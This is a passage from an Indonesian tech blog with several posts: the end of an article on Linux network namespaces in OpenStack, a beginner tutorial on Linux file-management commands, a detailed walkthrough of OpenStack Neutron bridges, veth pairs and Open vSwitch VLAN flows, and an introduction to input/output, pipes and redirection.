root@DEATH-STAR:~# ### Cek routing table di netns test-netns
root@DEATH-STAR:~# ip netns exec test-netns ip route show
default via 10.10.10.28 dev veth1 
10.10.10.0/27 dev veth1  proto kernel  scope link  src 10.10.10.25 
root@DEATH-STAR:~#
root@DEATH-STAR:~#
root@DEATH-STAR:~# ip netns exec test-netns ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=1 ttl=55 time=40.8 ms
64 bytes from 8.8.8.8: icmp_req=2 ttl=55 time=40.8 ms
64 bytes from 8.8.8.8: icmp_req=3 ttl=55 time=42.3 ms
^C
--- 8.8.8.8 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 40.817/41.328/42.347/0.720 ms
root@DEATH-STAR:~#

Network namespace test-netns sudah berhasil terkoneksi dengan Internet.

Untuk menghapus namespace, pakai perintah ip netns del <nama netns>

ip netns del test-netns

OpenStack & jaringan virtual

Setelah memahami sedikit tentang network namespace, kita akan lihat bagaimana OpenStack membangun jaringan virtual dengan network namespace.

Gambar di atas adalah perbandingan antara netns dan Open vSwitch.
Bagian gambar di sebelah kanan adalah network namespace, bagaimana masing-masing tenant OpenStack melihat jaringannya sebagai jaringan yang independen dan terpisah dengan jaringan tenant lainnya.

Di Open vSwitch, bagian jaringan di gambar yang sebelah kiri itu jaringan sebenarnya, tidak terpisah secara fisik. Jaringan masing-masing tenant jadi satu hanya saja dipisahkan dengan apapun mode yang dipilih oleh administrator, vlan contohnya. Silahkan lihat kembali artikel sebelumnya untuk mode-mode yang lain.

Kalau di tulisan yang lalu kita tahu OpenStack membuat penamaan interface dengan prefix qbr, qvo, qvb dengan masing-masing penggunaannya, di sini juga ada tiga lagi yaitu qg, qrouter, dan qr.
Mari kita lihat masing-masing nama prefix ini.

qrouter : Ini adalah prefix untuk network namespace
qg : Ini nama interface di namespace untuk interface yang terhubung ke jaringan luar, gampangnya kita sebut gateway.
qr : Ini adalah nama interface yang terhubung ke jaringan internal vm.

Di instalasi OpenStack di contoh ini, saya ambil salah satu namespace bernama qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d

ip netns show
qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d

Sedangkan untuk interface di netns tersebut:

root@Controller:~# ip netns exec qrouter-3b71f8b1-4f6f-4647-abd3-bac4b1aebe7d ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
7: qg-25efe5e5-07: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:84:ca:5c brd ff:ff:ff:ff:ff:ff
9: qr-6d6d8407-22: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:7f:a5:23 brd ff:ff:ff:ff:ff:ff
12: qr-c5ad4b75-f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether fa:16:3e:69:23:ee brd ff:ff:ff:ff:ff:ff
root@Controller:~#

Seperti terlihat, saya punya satu interface gateway qg-25efe5e5-07 dan 2 interface ke jaringan internal dengan prefix qr.

Saya harap tulisan ini bisa memberikan gambaran untuk para administrator bagaimana OpenStack networking itu dibangun.
Salah satu hal yang kompleks di OpenStack menurut saya adalah networking ini, rumit dan banyak sekali komponennya.

Artikel Berkaitan:
Membumikan OpenStack
Pengenalan yang “ramah” tentang OpenStack, ditulis dengan bahasa yang sederhana dan gampang dipahami

Memahami OpenStack Neutron lebih dalam
Memahami bagaimana OpenStack menggunakan Open vSwitch, bridge, dan mengatur flow packet

Convert Database OpenStack Cinder dari Sqlite3 ke MySQL - Debian Jessie
Kesalahan konfigurasi default OpenStack Cinder di Debian 8, dan bagaimana cara konversi database dari Sqlite3 ke MySQL

Belajar Linux Dasar - Manajemen file

2016-05-02T20:02:00+08:00

Tulisan ini menyambung artikel sebelumnya, Belajar Linux Dasar - Pengenalan Input & Ouput.

Penggunaan program-program di artikel ini dibuat sederhana dengan maksud supaya para pengguna Linux yang baru, atau yang belum familiar dengan terminal bisa langsung ketik perintah tanpa harus membaca manual yang panjang dan ~~boring~~ lengkap itu. Kalau sudah sedikit ngerti baru baca manual lengkapnya, atau istilahnya RTFM (Read The F[ine] Manual).

Di artikel ini saya tuliskan tentang manajemen file, bagaimana cara membuat, rename, copy, cut, dan hapus file.

Beberapa program yang dipakai:

ls, Untuk listing file dan direktori.
mkdir, Dipakai untuk membuat direktori baru.
touch, Update timestamp atau buat file baru.
mv, Move (cut + paste) dan rename file.
cp, Copy file dan direktori.
rm, Hapus file dan direktori.
ln, Untuk membuat link.

Di penulisan penggunaan program (synopsis), saya mengikuti Linux manual. Jadi argumen program di antara tanda [ dan ] bersifat opsional.

ls

ls dipakai untuk me-list nama-nama file dan direktori plus atributnya.
Synopsis

ls [OPTION] [FILE]

ls kalau tidak disuplai argumen apa-apa akan me-list nama-nama file di current directory, working atau current directory bisa dilihat dengan perintah pwd. File atau folder hidden dengan nama berawalan . (dot) juga tidak di-print kecuali ada argumen -a (all).

Contoh
Untuk me-listing file dan direktori di current directory, ketik ls tanpa argumen apa-apa.

ls

Output dengan perintah ls di atas semua file terlihat sama, kita tidak bisa bedakan mana file mana folder, berapa besar file-nya, dsb.

Tergantung program terminal dan environmentnya, biasanya output ls ada warna-warna untuk membedakan tipe file, kalau tidak ada warna, coba ini:

ls --color

Biarpun sudah dibedakan dengan warna, tetap tidak ada informasi kapan file-file itu terahir kali diakses, atau berapa ukurannya, atau siapa pemilik file itu. Supaya ls ada output informasi itu, pakai argumen -l.

ls -l --color

Untuk list file dan direktori yang bukan di current directory, folder /tmp misalnya

ls /tmp

Sudah dijelaskan di atas kalau file hidden dengan nama berawalan . (dot) tidak diprint, pakai argumen -a (all) kalau mau print termasuk yang hidden.

ls -a ~

Dua atau lebih argumen bisa dijadikan satu, misalnya untuk list atribut file termasuk yang hidden.

ls -la ~/

mkdir

mkdir dipakai untuk buat file direktori baru. saya sebut file karena memang di Unix dan Linux, direktori itu file, sama seperti file umumnya.
Cara pakai mkdir:

mkdir [OPTIONS] DIRECTORY

OPTIONS di sini opsional, boleh tidak dipakai. DIRECTORY adalah nama direktori yang mau dibuat.

Contoh
Membuat direktori blah di current directory:

mkdir blah

Membuat direktori blah dengan absolute path.

mkdir /tmp/blah

Kalau kita mau buat direktori baru, sekalian buat juga parent directory-nya kalau belum ada, kita bisa pakai argumen -p (parent).

mkdir -p blah/blah1/blah2/blah3

Dengan -p, mkdir tidak akan error kalau direktori yang dimaksud sudah ada.
Perintah di atas itu untuk buat direktori blah3, kalau direktori parent-nya blah2 belum ada, maka dibuat juga. Begitu juga kalau folder blah dan blah1 belum ada, maka akan dibuat juga.

Kalau kita mau buat banyak direktori baru, tidak perlu ketik perintah satu-satu.

mkdir {blah, blah1, blah2}

Perintah ini untuk buat direktori blah, blah1, dan blah2 di current directory. Sebenarnya tanda { dan } bukan fitur mkdir, tapi Linux shell.

touch

touch dipakai untuk modifikasi timestamp, atau buat file baru kalau file yang dimaksud tidak ada. Timestamp adalah waktu terakhir file diakses dan dimodifikasi.

Synopsis

touch [OPTION] FILE

Contoh

touch foo

Perintah itu, kalau file foo tidak ada maka dibuat baru, tapi kalau ada maka waktu akses dan modifikasi file yang dirubah. Waktu bisa dilihat dengan perintah ls.

ls -l foo

Tunggu beberapa menit, ulangi perintah touch foo kemudian ls -l foo dan perhatikan perbedaan outputnya.

mv

mv dipakai untuk rename atau move (cut + paste) file.

Synopsis

mv [OPTION]... [-T] SOURCE DEST

SOURCE adalah file atau direktori asal, dan DEST adalah file atau direktori tujuan.

Contoh
Rename direktori blah ke blah1

mv blah blah1

Pindahkan direktori blah1 ke /tmp

mv blah1 /tmp

Atau misalnya mau pindahkan blah1 ke /tmp/ dengan nama berbeda, blah2 misalnya

mv blah1 /tmp/blah2

Sangat simpel.

cp

cp dipakai untuk copy file.

Synopsis

cp [OPTION]... [-T] SOURCE DEST

Penjelasan SOURCE dan DEST sama dengan mv di atas.

Contoh
Copy file foo ke folder /tmp

cp foo /tmp

Untuk copy foo ke /tmp dengan nama berbeda, foo1 misalnya.

cp foo /tmp/foo1

Copy direktori.
Untuk copy direktori, gunakan argumen -r (recursive)

cp -r blah /tmp/blah1

Program cp tidak ada output apa-apa kalau sukses, kalau mau print file-file yang dicopy pakai argumen -v (verbose), misalnya:

cp -rv blah /tmp/blah1

rm

rm dipakai untuk menghapus file dan direktori.

Synopis

rm [OPTION]   FILE

OPTION bersifat opsional, FILE adalah file yang mau dihapus.

Contoh
Hapus file /tmp/foo

rm /tmp/foo

Hapus direktori dengan option -r (recursive)

rm -r /tmp/blah

Untuk hapus direktori, selain rm -r juga bisa pakai rmdir.

Kadang beberapa file tidak bisa begitu saja dihapus, kita bisa pakai option -f (force) untuk file-file yang susah dihapus.

rm -rf /tmp/blah

ln

ln dipakai untuk membuat file link.

Di Linux ada file dengan tipe link. Link itu kurang lebih seperti shortcut kalau di Windows.

Jenis link di Linux ada dua, soft link dan hard link. Soft link cara kerjanya kurang lebih seperti shortcut, sedangkan hard link seperti alias.

Soft link biasanya juga disebut dengan symbolic link atau pendeknya symlink.

Penjelasan untuk hard link agak low level, tapi saya akan coba jelaskan sedikit.

Misal saya buat file dengan nama foo, maka file foo ini punya struktur data yang disebut inode, inode ini unik untuk setiap file dan untuk sederhananya inode ini anggap saja nomor.

Misalnya inode untuk file foo itu 100, nah kalau kita buat hard link ke foo dengan nama bar, maka sama saja kita buat file baru dengan nama bar tapi dengan inode 100.
Kita edit foo maka bar juga berubah, begitu juga sebaliknya. Tapi kalau kita hapus salah satu nama foo misalnya, maka yang terhapus cuma foo, sedangkan inode 100 masih tetap ada, jadinya bar juga masih ada.

File di Linux cuma bisa terhapus kalau nama file untuk inode tertentu jumlahnya sama dengan 0, artinya kalau ada 5 hard link ke satu inode maka untuk benar-benar menghapus file, lima link tersebut harus dihapus.
Terus lagi hard link tidak bisa cross device, artinya target file untuk link tidak bisa beda partisi atau hard disk, harus sama. Sedangkan symlink tidak ada batasan seperti itu.

Contoh
Untuk membuat symlink ke file foo dengan nama bar

ln -s foo bar

Dengan symlink atau soft link, kalau kita hapus file target foo, maka bar disebut broken link. bar mengarah ke foo tapi foo tidak ada.

Sedangkan untuk hard link

ln foo bar

Dengan hard link, foo dan bar mengarah ke satu inode jadi seolah-olah file foo dan bar seperti file kembar yang selalu sinkron. Edit foo maka bar berubah, begitu juga sebaliknya. Hapus foo, bar masih bisa diakses.

Demonstrasi penggunaan link dengan hard link.

[dhani: ~] Endor > touch foo
[dhani: ~] Endor > echo "abcd" > foo
[dhani: ~] Endor > cat foo
abcd
[dhani: ~] Endor > ln foo bar
[dhani: ~] Endor > cat bar
abcd
[dhani: ~] Endor > echo "1234" > bar
[dhani: ~] Endor > cat foo
1234
[dhani: ~] Endor > rm foo
rm: remove regular file ‘foo’? y
[dhani: ~] Endor > cat bar
1234
[dhani: ~] Endor > rm -f bar
[dhani: ~] Endor >

Saya rasa program-program ini tidak susah dipahami. Dan kalau perlu memahami lebih lagi tentang program-program di atas, langsung saja, ahem… ~~RTFM~~, maksud saya baca manual masing-masing program dengan ketik perintah man <program>.

misalnya untuk program mkdir:

man mkdir

Kita lanjut lagi di tulisan berikutnya dengan program-program yang lain, Insya Allah.

[Edit]
Artikel selanjutnya: Belajar Linux Dasar - Manipulasi Teks dan Stream

Memahami OpenStack Neutron lebih dalam

2016-04-26T18:58:00+08:00

Beberapa waktu lalu, salah satu node server OpenStack kami mengalami system failure karena NIC Gigabit di server itu hang dan reset terus-menerus. Node yang fail ini service-nya networking atau di OpenStack disebut Neutron, dan akibatnya beberapa guest vm unreachable karena sistem failure ini.

Meskipun pada akhirnya saya berhasil mengembalikan guest os beroperasi lagi, tapi Saya perlu waktu yang lama sampai akhirnya sistem up dan running. Kendalanya waktu itu status OpenStack out of sync, status di OpenStack sistem running padahal yang sebenarnya dalam keadaan failed.

Parahnya lagi waktu problem itu, saya belum benar-benar mengerti cara kerja networking di OpenStack, jadinya Saya sedikit kebingungan dan perlu waktu lama sampai akhirnya kembali normal.
Saya tahu cara mengadministrasi jaringan OpenStack, tapi saya tidak benar-banar tahu bagaimana sebenarnya OpenStack Neutron itu di belakang layar.
Karena problem itu kemudian saya coba memahami OpenStack Neutron lebih dalam lagi.

Di artikel ini saya akan gambarkan apa yang sudah Saya pelajari, bagaimana OpenStack Neutron itu membuat jaringan virtual di Linux. Bagaimana interkoneksi antar vm dibuat, dan seterusnya.
Saya tidak membahas bagaimana membuat port di OpenStack, cara assign floating ip, dan sebagainya. Yang mau saya jelaskan lebih ke low level bagaimana sebenarnya networking di OpenStack itu beroperasi.

Setup

Saya jelaskan dulu deployment OpenStack yang saya pakai. Di setup ini Saya gunakan vlan untuk komunikasi antar vm.
Ada beberapa mode di OpenStack Neutron untuk komunikasi antar vm:

flat : Ini mode routing biasa, antar tenant OpenStack tidak ada segmentasi jaringan.
vlan : Antar tenant OpenStack masing-masing tersegmentasi dengan vlan, beda tenant beda vlan id.
vxlan: Segmentasi jaringan menggunakan vxlan.
gre : Segmentasi jaringan antar tenant menggunakan tunneling generic routing encapsulation.

Dalam setup ini saya gunakan vlan dengan range vlan id untuk tenant dari 1000 - 1100.

Di setup ini ada tujuh guest os yang berjalan di OpenStack, tapi di contoh ini saya ambil tiga saja. Tiga vm itu anggap saja VM1, VM2, dan VM3. Tiga vm ini berjalan di dua server compute atau di OpenStack disebut Nova.

Saya gambarkan kurang lebih tiga vm itu seperti di bawah:

Keterangan:

A, E, W : Guest OS.
B, F, X : Linux bridge
C, Y : Openvswitch bridge dengan nama br-int (default OpenStack).
D, Z : Openvswitch bridge dengan nama br-vm.

Kalau Anda merasa tidak familiar dengan gambar di atas, maka ada beberapa komponen penting yang harus dipelajari dulu sebelumnya, yaitu:

Tap device : Interface virtual yang berjalan di layer 2.
Linux Bridge: ini bridge yang dibuat dengan brctl.
Linux virtual ethernet : Linux veth, Linux veth adalah virtual interface yang berpasang-pasangan. Anggap pasangan veth A dan B, seperti pipa, apa yang masuk ke A akan keluar lewat B, yang masuk lewat B keluar lewat A.
Openvswitch: Software switching, seperti switch fisik tapi di lingkungan virtualisasi.

Di OpenStack Neutron, Openvswitch juga diatur dengan OpenFlow. saya jelaskan singkat saja, di dalam switch ada yang namanya control plane dan data plane. Control plane fungsinya untuk mengatur flow paket, sedangkan data plane mengeksekusi flow tersebut. Biasanya dalam switch umum, control plane dan data plane jadi satu. Dengan OpenFlow, control plane dipisah dari data plane dan control plane diatur lewat OpenFlow.

Keuntungannya, switch yang berbeda-beda dari vendor apapun kalau pakai OpenFlow maka bisa diatur dari software yang sama. Cisco tidak harus dengan Cisco IOS, Juniper tidak harus dengan JunOS. Istilah untuk ini namanya SDN (Software Defined Networking).

Empat hal di atas itu yang harus dipelajari dulu kalau memang masih asing, karena OpenStack Neutron menggunakan 4 komponen di atas untuk membentuk jaringan.

Melihat gambar di atas, mungkin Anda punya pertanyaan mengapa harus ada Linux bridge di situ. Ini juga pertanyaan saya pertama kali karena seperti tidak masuk akal menempatkan Linux bridge di antara vm dan Openvswitch br-int. Lebih logis kalau tap device langsung ke Openvswitch bridge br-int dari pada ke Linux bridge.

Kemudian saya tahu dari hasil baca sana-sini bahwa bridge itu memang diperlukan. Fitur security di OpenStack memerlukan bridge itu karena firewall tidak akan berfungsi kalau interface tap dijadikan port Openvswitch. Jadi, anggap saja bridge B, F, dan X adalah firewall bridge.

OpenStack Networking

Dilihat dari gambaran besarnya, OpenStack Neutron membagi network jadi tiga kategori:

Management Network: Jaringan yang digunakan untuk memanage server OpenStack.
External: Jaringan yang digunakan guest OS untuk berkomunikasi dengan jaringan luar, Internet misalnya.
Internal: Jaringan yang digunakan untuk komunikasi antar virtual machine.

Di setup ini, saya jadikan management dan external network jadi satu jaringan. Di gambar itu interface untuk management dan external menggunakan interface eth0, sedangkan interface untuk internal eth1.

Di tulisan ini saya fokuskan untuk jaringan internal saja, jaringan external dan management tidak karena Saya rasa dua network itu cukup jelas fungsinya.

Penjelasan masing-masing komponen network internal seperti di bawah:

br-vm: Bridge Openvswitch untuk jaringan internal vm saya namakan br-vm. Pengaturan vlan untuk tenant ada di bridge ini.
br-int: Ini bridge Openvswitch internal OpenStack. Bridge ini tidak diatur oleh user atau konfigurasi, tapi OpenStack yang mengatur. Fungsi bridge ini semacam patch panel fisik, jalur-jalur ke vm diatur di bridge ini.
Linux bridge: Seperti saya terangkan di atas, bridge ini fungsi utamanya untuk security. Setiap vm mempunyai bridge sendiri-sendiri.

Antara br-int dengan br-vm terkoneksi dengan Linux veth. Ujung Linux veth yang satu namanya int-br-vm, ujung satunya phy-br-vm. int-br-vm ditempatkan di bridge br-int, sedangkan phy-br-vm ditempatkan di br-vm.

Proses networking OpenStack

Untuk setiap vm baru yang dibuat, OpenStack neutron membuat satu tap interface, satu Linux bridge, dan satu pasang Linux veth.
Tap interface untuk di-attach ke vm dan vm mapping tap itu ke eth0.
Satu Linux bridge untuk keperluan firewall. Member bridge ini ada dua, tap yang mengarah ke vm dan salah satu interface virtual Linux veth. Sedangkan Linux veth yang satunya lagi jadi member bridge br-int.

OpenStack membuat prefix nama interface yang konsisten, prefix yang dimaksud seperti di bawah:

tap : Interface dengan prefix tap adalah tap device.
qbr : Interface dengan prefix qbr menandakan Linux bridge.
qvb : qvb adalah salah satu dari pasangan Linux veth yang jadi member bridge qbr.
qvo : Ini pasangan Linux veth qvb. Jadi qvo dan qvb itu sepasang veth. qvo jadi member bridge Ovs (Openvswitch) br-int.

Jadi untuk satu vm, prefix interface beda-beda cuma suffixnya sama. Misal suffix interface abcd-01, maka tap nya tapabcd-01, bridge-nya qbrabcd-01, veth yang di Linux bridge qvbabcd-01, veth yang di Ovs bridge qvoabcd-01.

Contoh di bawah ini saya ambilkan dari salah satu server compute dengan salah satu guest OS yang Saya beri nama alderaan:

Guest interface
Dari guest, nama interface eth0 dengan mac address fa:16:3e:0c:24:82

administrator@alderaan:~$ ip link show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
link/ether fa:16:3e:0c:24:82 brd ff:ff:ff:ff:ff:ff
administrator@alderaan:~$

Tap device
Dari compute server kita cari tap device dengan mac address yang 40 bit di belakangnya sama dengan yang terbaca di guest OS, yaitu 16:3e:0c:24:82. ip link show untuk print interface.

root@nova2:~# ip link show tapdd0ae56d-5f
50: tapdd0ae56d-5f: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master qbrdd0ae56d-5f state UNKNOWN mode DEFAULT group default qlen 500
link/ether fe:16:3e:0c:24:82 brd ff:ff:ff:ff:ff:ff
root@nova2:~#

Dari sini diketahui nama interface tap tapdd0ae56d-5f, berarti suffix-nya dd0ae56d-5f.

Linux bridge
Karena sudah tahu suffix interface dd0ae56d-5f, tinggal tambah prefix qbr jadi qbrdd0ae56d-5f.

root@nova2:~# brctl show qbrdd0ae56d-5f
bridge name bridge id       STP enabled interfaces
qbrdd0ae56d-5f      8000.fad1404dbac4   no      qvbdd0ae56d-5f
                        tapdd0ae56d-5f
root@nova2:~#

Linux veth
Dari suffix itu, berarti pasangan veth nya qvodd0ae56d-5f dan qvbdd0ae56d-5f.
qvbdd0ae56d-5f jadi member Linux bride qbrdd0ae56d-5f, seperti terlihat di command brctl di atas.
qvodd0ae56d-5f jadi member Ovs bridge br-int.

root@nova2:~# ovs-vsctl show
da610347-b798-4520-b5a1-4f8899b3e1a4

    Bridge br-int
        fail_mode: secure
        Port br-int
            Interface br-int
                type: internal
        Port "qvodd0ae56d-5f"
            tag: 3
            Interface "qvodd0ae56d-5f"
        Port int-br-vm
            Interface int-br-vm
    ovs_version: "2.3.0"
root@nova2:~#

Interface yang tidak berhubungan saya hilangkan dari output.

Menurut saya yang buat susah itu nama interface yang aneh dan tidak deskriptif itu. Kalau misalnya nama interface dibuat seperti qbralderaan, qvoalderaan, atau qvbalderaan mungkin lebih gampang buat diingat.

Packet Flow

Di bagian ini saya bahas bagaimana aliran paket di Openvswitch dengan setup di atas.
Di setup ini tenant menggunakan range vlan id dari 1000 - 1100. Karena tenant cuma ada satu, vlan yang terpakai baru vlan id 1000.

Vlan ini di tag di br-vm untuk vlan tenant, kemudian di Ovs br-int vlan tersebut di rewrite dengan vlan yang diatur sendiri oleh OpenStack dan diarahkan ke port yang jadi member vlan tersebut.

Dalam setup ini, vlan tenant adalah vlan 1000 sedangkan vlan internal OpenStack Neutron vlan 3. Vlan 3 ini sepenuhnya OpenStack yang mengatur, tidak ada campur tangan user dan sebaiknya tidak dirubah secara langsung.

root@nova2:~# ovs-vsctl show
da610347-b798-4520-b5a1-4f8899b3e1a4

    Bridge br-int
        fail_mode: secure
        Port br-int
            Interface br-int
                type: internal
        Port "qvodd0ae56d-5f"
            tag: 3
            Interface "qvodd0ae56d-5f"
        Port int-br-vm
            Interface int-br-vm
    ovs_version: "2.3.0"
root@nova2:~#

Terlihat dari output, vlan internal OpenStack vlan 3 (tag: 3). Mungkin counter-intuitive, yang dimaksud tag: 3 di output itu sebenarnya mode port access, bukan trunk. Jadi port qvodd0ae56d-5f itu port vlan 3 mode access.

Untuk memperjelas flow paket, gambarannya seperti di gambar.

Seperti saya jelaskan sebelumnya, packet flow di Openvswitch itu tidak diatur langsung dari Openvswitch, tapi dari OpenFlow.
Mari kita lihat flow nya:

root@nova2:~# ovs-ofctl dump-flows br-int
NXST_FLOW reply (xid=0x4):
 cookie=0x0, duration=417414.623s, table=0, n_packets=11149297, n_bytes=1952040247, idle_age=0, hard_age=65534, priority=1 actions=NORMAL
 cookie=0x0, duration=410729.710s, table=0, n_packets=13337809, n_bytes=6907864027, idle_age=0, hard_age=65534, priority=3,in_port=7,dl_vlan=1000 actions=mod_vlan_vid:3,NORMAL
 cookie=0x0, duration=417413.441s, table=0, n_packets=4617, n_bytes=295786, idle_age=65534, hard_age=65534, priority=2,in_port=7 actions=drop
 cookie=0x0, duration=417411.202s, table=0, n_packets=0, n_bytes=0, idle_age=65534, hard_age=65534, priority=2,in_port=6 actions=drop
 cookie=0x0, duration=417414.582s, table=22, n_packets=0, n_bytes=0, idle_age=65534, hard_age=65534, priority=0 actions=drop
root@nova2:~#

Di output line ke dua

in_port=7,dl_vlan=1000 actions=mod_vlan_vid:3,NORMAL

Maksudnya paket yang masuk lewat port 7, port 7 ini int-br-vm, kalau paket tersebut ada vlan header dengan vlan id 1000 maka vlan itu direwrite ke vlan 3. Vlan 3 ini kemudian di untag di port qvodd0ae56d-5f.

Untuk memahami kenapa ada dua vlan berbeda ini, anggap saja ada dua versi vlan untuk tenant yang sama, vlan 1000 dan vlan 3. Vlan 1000 versi saya (user) vlan 3 versi OpenStack.
Nah karena saya dan OpenStack tidak sepakat nomor id vlan-nya, maka perlu pemetaan vlan. Vlan 1000 versi user diterjemahkan ke vlan 3 versi OpenStack.

Kalau saya ditanya kenapa OpenStack tidak pakai vlan yang dipilih user saja, Saya tidak bisa jawab karena memang Saya tidak tahu kenapa desainnya seperti itu. Padahal logis saja kalau pakai vlan 1000 tanpa perlu translasi vlan.

Kita lanjut lihat flow di bridge br-vm:

root@nova2:~# ovs-ofctl dump-flows br-vm
NXST_FLOW reply (xid=0x4):
 cookie=0x0, duration=417699.483s, table=0, n_packets=13597383, n_bytes=6938457305, idle_age=0, hard_age=65534, priority=1 actions=NORMAL
 cookie=0x0, duration=411015.347s, table=0, n_packets=10778277, n_bytes=1641396036, idle_age=0, hard_age=65534, priority=4,in_port=3,dl_vlan=3 actions=mod_vlan_vid:1000,NORMAL
 cookie=0x0, duration=417698.995s, table=0, n_packets=48, n_bytes=3976, idle_age=65534, hard_age=65534, priority=2,in_port=3 actions=drop
root@nova2:~#

Output line ke dua:

 in_port=3,dl_vlan=3 actions=mod_vlan_vid:1000,NORMAL

Paket dengan header vlan 3 dan masuk dari port 3 (phy-br-vm) akan dipetakan ke vlan user vlan 1000. Vlan 1000 ini yang dipakai untuk komunikasi antar vm yang beda server compute.

Saya harap penjelasan saya tentang internal network OpenStack ini bisa dipahami dan bisa memberikan gambaran bagaimana OpenStack networking itu beroperasi.

Sebenarnya belum semua tentang internal network dibahas karena masih ada virtual router OpenStack dengan network namespace yang belum dijelaskan. Tapi saya batasi sampai di sini saja karena terlalu panjang kalau virtual router dan network namespace ditulis juga.

Mungkin lain kali, mungkin.

Artikel Berkaitan:
Membumikan OpenStack
Pengenalan yang “ramah” tentang OpenStack, ditulis dengan bahasa yang sederhana dan gampang dipahami

Cara Kerja OpenStack Networking - Memahami Network Namespace
Pembahasan tentang Linux Network Namespace dan bagaimana OpenStack menggunakan Network Namespace untuk membuat jaringan virtual.

Belajar Linux Dasar - Pengenalan Input & Output

2016-04-22T13:02:00+08:00

Photo credit: pixabay.com

GNU/Linux atau sebutan gampangnya Linux, hari ini sudah berbeda jauh sekali dibanding Linux dulu. Linux pada zaman dahulu kala identik dengan sistem operasi yang susah dan cuma orang-orang komputer saja yang pakai Linux. Sekarang Linux sudah gampang, tanpa perlu paham command pun pengguna sudah bisa pakai Linux.

Dulu waktu pertama belajar Linux, saya bingung waktu masukkan flash disk tapi di layar tidak muncul apa-apa. Putar mp3 tapi tidak ada suara apa-apa yang keluar, mau putar mp3 saja perlu perjuangan.
Syukurnya sekarang para pengguna baru tidak perlu melalui hal-hal ribet itu, cukup install dan siap pakai.

Tapi ada hal lain, buat pengguna yang berencana menjadi Linux admin atau berencana membuat server dengan Linux, maka belajar command atau perintah-perintah Linux tetap harus dikuasai. Mau tidak mau tetap harus buka terminal dan ketik perintah.
Karena itu tulisan ini saya kategorikan di Linux Padawan. Padawan kalau di film Star Wars adalah seorang yang sedang belajar menjadi seorang master Jedi.

Entah mengapa saya merasa resource pembelajaran Linux berbahasa Indonesia masih minim, mungkin juga Saya salah tapi lihat saja situs seperti linux.or.id. Benar atau salah tapi asumsi itu yang membuat Saya menulis artikel ini.

Saya berniat menulis artikel tentang perintah-perintah Linux yang sering dipakai, ada kemungkinan juga akan berkelanjutan. Dimulai dari pengenalan Input dan Output sampai ke program.
Di Linux, ada package software yang namanya GNU Coreutils. Ini berisi set program-program standar yang pasti ada di setiap distribusi Linux. Tulisan ini akan coba menjelaskan penggunaan program-program Coreutils yang sering dipakai, dan kalau dirasa kurang akan ditambah dengan program-program yang lain.

Sebelum ke program, kita perlu pahami beberapa hal dasar di Linux. Yaitu I/O (Input/Output), pipe, redirection, dan struktur direktori.

Input/Output
Apa yang kita ketik di terminal termasuk input, dan yang keluar dari terminal namanya output.
Input tidak harus ada di terminal, begitu juga output. Input dan output bisa berupa file.
Misal kita mau print isi file /etc/passwd dengan command cat

cat /etc/passwd

cat adalah programnya, file /etc/passwd inputnya. Outputnya diprint di terminal

Linux punya special device untuk I/O, yaitu standard input atau stdin, standard ouput disebut stdout, dan standard error stderr.

stdin: Input yang ditulis atau diprint di terminal.
stdout: Output normal dari program.
stderr: Output program untuk pesan error.

Jadi jenis input di Linux ada dua, file dan terminal (stdin). Sedangkan jenis output ada tiga, file, output di terminal (stdout), dan output terminal kalau error (stderr).

Pipe
Ada fitur menarik di Unix dan Linux, output dari satu program bisa dijadikan input program lain, caranya dengan memakai pipe. Disebut pipe mungkin karena cara kerjanya seperti pipa, menghubungkan output dan input. Pipe dilambangkan dengan karakter |.

Contoh, kita mau lihat uid dari nama user nobody. Kita pakai dua program, cat dan grep. Output dari cat dijadikan input program grep dengan pipe.

cat /etc/passwd | grep "nobody"

# Output yang terprint di terminal (stdout) seperti dibawah
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Maksud dari command di atas, cat /etc/passwd untuk print isi file /etc/passwd ke terminal, sedangkan grep “nobody” untuk filter baris teks yang ada tulisan nobody.
Ouput dari cat /etc/passwd tidak diprint ke terminal tapi diarahkan ke pipe. Pipe ini kemudian mengambil output dari perintah pertama dan menjadikannya input untuk perintah ke dua grep “nobody”.
Ringkasnya, print isi file /etc/passwd tapi cuma baris yang ada kata nobody saja. Dari output kita tahu uid user nobody adalah 65534, lain sistem hasilnya bisa beda.

Pipe tidak terbatas dua program saja, lebih dari dua juga bisa, misalnya.

cat /etc/passwd | grep "nobody" | awk -F: '{print $3}'

Redirection
Fitur lain lagi, namanya redirection.
Kita bisa me-redirect atau memindahkan output atau input program. Misalnya, program yang outputnya ke stdout atau ke terminal bisa diredirect atau dipindahkan ke file, output dari stderr diredirect ke stdout, dan sebagainya.

Karakter > untuk redirect output.
Karakter < untuk redirect input.

Contohnya, command di atas cat /etc/passwd | grep “nobody” outputnya tidak harus terminal, kita bisa redirect atau arahkan output ke file user misalnya.

cat /etc/passwd | grep "nobody" > user

Command di atas tidak ada output apa-apa di terminal karena output kita redirect atau pindahkan ke file user. Di file user, isinya sama saja dengan output perintah yang pertama.

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Untuk redirect input, kita gunakan karakter <

Contoh untuk menghitung jumlah baris file /etc/passwd.

wc -l /etc/passwd

# Output di stdout
62 /etc/passwd

62 adalah jumlah baris, /etc/passwd adalah nama file.
Sekarang dengan redirect input.

wc -l < /etc/passwd

# Output di stdout
62

Maksud dari command wc -l yang ke dua, file /etc/passwd diredirect ke stdin dan kemudian dijadikan input perintah wc -l.
